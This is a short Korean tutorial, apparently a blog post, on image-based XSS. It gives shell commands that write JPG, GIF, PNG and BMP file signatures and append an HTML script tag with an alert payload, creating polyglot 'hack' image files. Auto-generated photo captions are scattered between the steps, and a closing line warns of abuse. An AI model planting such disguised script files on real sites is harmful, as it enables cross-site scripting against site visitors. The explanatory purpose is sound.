이미지 XSS 공격

jpg file 파일 생성

echo -en "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00" > hack.jpg

<script 삽입>

echo -n "<html><script>alert('XSS ATTACK');</script>" >> hack.jpg

앉아있는, 테이블, 녹색, 쥐고있는이(가) 표시된 사진

자동 생성된 설명

gif file 파일 생성

echo -en "\x47\x49\x46\x38\x39\x61" > hack.gif

<script 삽입>

echo -n "<html><script>alert('XSS ATTACK');</script>" >> hack.gif

앉아있는, 녹색, 표지판, 테이블이(가) 표시된 사진

자동 생성된 설명

png file 파일 생성

echo -en "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0DIHDR" > hack.png

<script 삽입>

echo -n "<html><script>alert('XSS ATTACK');</script>" >> hack.png

앉아있는, 녹색, 표지판, 테이블이(가) 표시된 사진

자동 생성된 설명

bmp file 파일 생성

echo -en "\x42\x4D\x00\x00\x00\x00\x00\x00\x00\x36" > hack.bmp

<script 삽입>

echo -n "<html><script>alert('XSS ATTACK');</script>" >> hack.bmp

앉아있는, 키보드, 닫기, 대형이(가) 표시된 사진

자동 생성된 설명

이와 같은 방식으로 스크립트 구문을 작성하여 악용할 경우 악성코드를 심어 놓거나 불법적인 사이트에 접속하도록 할 수 있으므로 주의해야한다.